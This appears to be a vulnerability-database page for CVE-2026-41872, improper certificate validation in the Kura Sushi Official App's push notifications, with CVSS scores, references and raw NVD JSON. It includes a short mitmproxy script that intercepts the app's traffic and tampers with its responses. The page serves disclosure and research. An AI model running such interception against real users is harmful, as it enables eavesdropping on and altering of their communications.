CVE-2026-41872

Description

"Kura Sushi Official App" provided by EPG, Inc. is vulnerable to improper certificate validation. A man-in-the-middle attack may allow eavesdropping on, or altering, the communication on push notifications between the affected application and the relevant server.

CVSS Details

CVSS Score

7.4

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Kura Sushi Official App (未在文本中指定具体版本号，建议参考官方商店更新记录)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept: Demonstrating a Man-in-the-Middle (MitM) setup to intercept traffic.
# This requires the attacker to be on the same network as the victim.
# Tools like mitmproxy can be used because the app accepts any certificate.

from mitmproxy import http

class Interceptor:
    def request(self, flow: http.HTTPFlow) -> None:
        # Log the intercepted request URL and headers
        print(f"[+] Intercepted Request: {flow.request.pretty_url}")
        print(f"[+] Headers: {flow.request.headers}")

    def response(self, flow: http.HTTPFlow) -> None:
        # Check if the traffic is related to push notifications
        if "push" in flow.request.path.lower() or "notification" in flow.request.path.lower():
            print(f"[+] Sensitive Push Notification Traffic Detected!")
            # Example of tampering with the response (Integrity impact demonstration)
            original_content = flow.response.content
            print(f"[+] Original Payload: {original_content}")
            
            # Inject a test message to prove tampering capability
            modified_content = original_content.replace(b"status", b"tampered_status")
            flow.response.content = modified_content
            print(f"[+] Modified Payload Sent to App: {modified_content}")

# Addons configuration for mitmproxy
addons = [Interceptor()]

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41872
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41872
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41872/
[4] VulDB https://vuldb.com/cve/CVE-2026-41872
[5] https://apps.apple.com/jp/app/id942355925
[6] https://jvn.jp/en/jp/JVN38632731/
[7] https://play.google.com/store/apps/details?id=jp.co.kura_corpo&hl=ja

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41872", "sourceIdentifier": "[email protected]", "published": "2026-05-12T06:16:09.400", "lastModified": "2026-05-12T06:16:09.400", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "\"Kura Sushi Official App\" provided by EPG, Inc. is vulnerable to improper certificate validation. A man-in-the-middle attack may allow eavesdropping on, or altering, the communication on push notifications between the affected application and the relevant server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://apps.apple.com/jp/app/id942355925", "source": "[email protected]"}, {"url": "https://jvn.jp/en/jp/JVN38632731/", "source": "[email protected]"}, {"url": "https://play.google.com/store/apps/details?id=jp.co.kura_corpo&hl=ja", "source": "[email protected]"}]}}